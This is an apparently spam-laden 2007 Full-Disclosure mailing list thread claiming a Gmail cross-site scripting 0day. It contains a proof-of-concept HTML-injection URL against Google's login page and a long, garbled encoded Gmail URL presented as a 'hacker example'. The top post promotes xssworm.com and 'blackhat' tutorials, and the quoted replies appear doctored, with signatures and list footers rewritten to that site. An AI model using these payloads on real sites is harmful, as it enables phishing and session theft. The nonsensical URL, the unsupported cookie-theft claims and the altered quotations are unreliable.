[Full-disclosure] Gmail 0day

XSS Worm XSS Security Information Portal cross-site-scripting-security at xssworm.com
Fri Nov 9 18:24:32 GMT 2007


Yes all XSS is very serious and not for making jokes, if pdp said that
hacker can steal data the CSS on google could be very dangerous
vulnerability

Blackhat SEO XSS
<http://www.xssworm.com:80/?index?blackhat=seo#extreme>hacker example:

http://mail.google.com/mail.%5CINBOX.%3C%252E18%252E/%2E%2E/local_url?%2E\l.%5CINBOX.%3C%252E18%252E/%2E%2ExSSr0X.%2e!!@!!!@@!!!@!@!&q=/mail.%5CINBOX.%3C%252E18%252E/%2E%2E/local_url?%2E\l.%5CINBOX.%3C%252E18%252E/%2E%2ExSSr0X.%2e!!@!!!@@!!!@!@!&q=http://xssworm.com/&seo=blackhat<http://mail.google.com/mail.%5CINBOX.%3C%252E18%252E/%2E%2E/local_url?%2E%5Cl.%5CINBOX.%3C%252E18%252E/%2E%2ExSSr0X.%2e%21%21@%21%21%21@@%21%21%21@%21@%21&q=/mail.%5CINBOX.%3C%252E18%252E/%2E%2E/local_url?%2E%5Cl.%5CINBOX.%3C%252E18%252E/%2E%2ExSSr0X.%2e%21%21@%21%21%21@@%21%21%21@%21@%21&q=http://xssworm.com/&seo=blackhat>

Please if you search XSS hacking also visit XSSWORM.COM
here: http://xssworm.com we have updates with blackhat and whitehat video
with XSS hacking tutorial by blackhat[2] Sunjester from litehackers.info

vaj

-- 
Francesco Vaj [CISSP - GIAC]
CSS Security Researcher - xssworm.com
mailto:vaj at nospam.xssworm.com
aim: XSS Cross Site
------

[2]
http://xssworm.blogvis.com/9/xssworm/what-is-a-blackhat-hacker-and-where-are-black-hats-hacking/


On Nov 9, 2007 8:36 AM, pdp (architect) <pdp.gnucitizen at googlemail.com>
wrote:

> well this XSS can lead to so much data being stolen that it is not even
> funny!
>
>
> On Nov 8, 2007 8:55 PM, Juergen Marester <marester.juergen at gmail.com >
> wrote:
>
> > wow ! 0day !
> > damn, 0day, XSS ...
> >
> >
> > On 11/8/07, silky <michaelslists at gmail.com> wrote:
> > >
> > > worked for me minutes after it was posted. seems fixed now.
> > >
> > > On 11/9/07, crazy frog crazy frog < i.m.crazy.frog at gmail.com> wrote:
> > > > i tested xssworm on gmail latest version
> > > >
> > > > On Nov 8, 2007 7:04 AM, Scripter Hack <xss2root at gmail.com > wrote:
> > > > > There is a html injection video in https://www.xssworm.com<https://www.google.com>.
> > > > > It is very critical, you can get the cookie to login into gmail or
> > > > > other service.
> > > > >
> > > > > POC:
> > > > >
> > > > > https://www.google.com/accounts/ServiceLogin?service=mail&rm=false&continue=http%3A%2F%2Fmail.google.com%2Fmail%2F%3Fui%3Dhtml%26zy%3Dl&ltmpl=default&ltmplcache=2&passive=truel#
> > > > > "><h1><a%20href=//xssworm.com/>xssworm</a></h1>
> > > > >
> > > > > More:http://xss2root.blogspot.com@xssworm.com/<http://xss2root.blogspot.com/>
> > > > > _______________________________________________
> > > > > Full-Disclosure - We believe in it.
> > > > > Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> > > > > Hosted and sponsored by Secunia - http://secunia.com/
> > > > >
> > > >
> > > >
> > > >
> > > > --
> > > > why advertise on secgeeks?
> > > > http://secgeeks.com@xssworm.com<http://secgeeks.com/Advertising_on_Secgeeks.com>
> > > > http://newskicks.com
> > > >
> > > > _______________________________________________
> > > > Full-Disclosure - We believe in xss.
> > > > Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> > > > Hosted and sponsored by Secunia - http://xssworm./secunia.com/<http://secunia.com/>
> > > >
> > >
> >
> >
>
>
>
> --
> pdp (acronym) | petrol v. petco
> http://www.xssworm.com <http://www.gnucitizen.org>
>